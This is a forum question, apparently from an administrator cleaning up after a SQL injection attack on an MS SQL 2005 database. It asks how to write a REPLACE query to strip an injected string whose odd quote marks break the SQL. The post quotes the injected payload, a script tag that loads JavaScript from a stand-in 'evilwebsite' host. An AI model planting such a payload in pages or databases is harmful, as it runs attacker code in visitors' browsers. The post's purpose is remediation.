Disclaimer: I do not manage SQL server for this customer and I know this is bad.. this is to fix the end result of a sql injection attack. New customer, getting paid to fix and will make recommendations afterwards. It is in MS SQL 2005
Their backups suck. They are already working with some web devs to fix the code on their site so this can't happen in the future and I have revamped the backup scheme to something that actually, you know... backs up somewhere.
There was a sql injection attack, the string: "></title><script src="
http://evilwebsite/file.php"></script><!-- was inserted just before the real data in gobs of fields in multiple tables. Note the odd number of "'s
I am trying to write a sql replace query to wipe out the evil string with nothing to repair the DB. It is not ideal but it is what we've got. However, the jackasses who did the attack are smarter than me in SQL and stuck a " in the string so my commands fail due to the unclosed quotes. Can one of you geniuses show me how to write a query that will do what I need with the screwy quotes?
I have the infected table up on another server right now to test on.